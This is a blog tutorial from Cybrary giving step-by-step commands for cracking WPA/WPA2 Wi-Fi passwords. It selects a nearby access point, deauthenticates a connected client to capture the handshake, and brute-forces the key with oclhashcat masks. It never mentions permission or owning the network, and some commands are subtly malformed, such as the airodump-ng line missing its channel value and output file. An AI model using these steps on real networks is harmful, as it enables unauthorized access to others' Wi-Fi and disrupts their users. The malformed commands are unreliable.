Use GPU to Speed Up WPA/WPA2 Password Cracking - Cybrary

There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we'll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)

  1. Aircrack-ng
  2. Oclhashcat

This guide assumes the following things:

  • wlan0                             is a WiFi interface
  • mon0                             is the interface in monitor mode
  • <channel>                     refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)
  • # (hash symbol)           is used to mark start of a command


Open up a terminalStart by putting Wi-Fi interface in monitor mode

#airmon-ng start wlan0

This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.Then, start sniffing air for all AP's in the area.

#airodump-ng mon0

This will give you information about all AP's in your vicinity. Select one with highest strength and focus on that one.Press Ctrl+C to stop above command and type:

#airodump-ng –c --bssid 00:2d:37:4b:e4:d5 –w mon0

This command only sniffs for one specific AP:-c tells which channel to sniff-bssid is the MAC of AP to target-w tell to write a file to capture handshake (for later use in recovering password)mon0 is the monitor interfaceNotice the MAC address of clients shown in the terminal; we'll need it for the next step. Now, open a second terminal and type:

#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0

This command says to de-authenticate a client from its AP-0 tell how many time to send deauth signal (in this case 5 times)-a tell the MAC of AP-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).Once handshake file is captured and written (in format file.cap), clean the file using the following command:

#wpaclean clean_file.cap captured.cap

Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). Now, prepare the file for hashcat by:

#aircrack-ng clean_file.cap -J for_cat

Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) Now, begin the cracking process by:

#oclhashcat –m 2500 –a 3 --session=my_session /for_cat.hccap /mymask.hcmask

Here, –m 2500 tell to crack WPA/WPA2-a 3 tells to use brute-force or mask based brute force (more on it later)-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)/for_cat.hccap is path to your captured and cleaned prepared hashcat file/mymask.hccap is path to the mask fileOnce it's done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) NOTES ON HASHCAT MASKSThe mask can take following format:

  • ?u for upper case letters (ABC…)
  • ?l for lower case letters (abc…)
  • ?d for numbers
  • ?s for symbols (ASCII only I think)
  • ?a use all of the above characters

Thus to create a mask type in a black file:

  • ?d?d?d?d?d?d?d?d for a 8 digit password

That’s it for this tutorial. Honorable mention goes to blackMORE Ops.

Start learning with Cybrary

Create a free account

Related Posts

All Blogs